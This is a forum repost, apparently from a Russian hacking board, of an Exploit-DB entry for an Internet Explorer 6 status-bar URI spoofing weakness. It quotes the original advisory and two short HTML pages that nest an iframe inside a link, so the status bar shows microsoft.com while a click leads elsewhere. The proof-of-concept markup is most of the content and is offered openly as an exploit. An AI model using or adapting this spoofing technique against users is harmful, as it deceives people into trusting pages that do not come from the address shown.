Exploit Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24720
Проверка EDB
  1. Пройдено
Автор
BENJAMIN TOBIAS FRANZ
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2004-11-02
Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation
Код:
source: https://www.securityfocus.com/bid/11590/info

Microsoft Internet Explorer is reported prone to a URI obfuscation weakness.

This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to originate from a trusted location.

This vulnerability is reported to affect Internet Explorer 6, other versions might also be affected.

HTML code for page #1 called "btf.htm":

<a href="http://www.microsoft.com/">
<iframe src="./btf-spoofing.htm" frameborder="0" scrolling="no" width="70"
height="25" marginheight="0" marginwidth="0"></iframe>
</a>

HTML code for page #2 called "btf-spoofing.htm":

<a href="http://www.google.com/" target="_top">Click here</a>
 
Источник
www.exploit-db.com

Похожие темы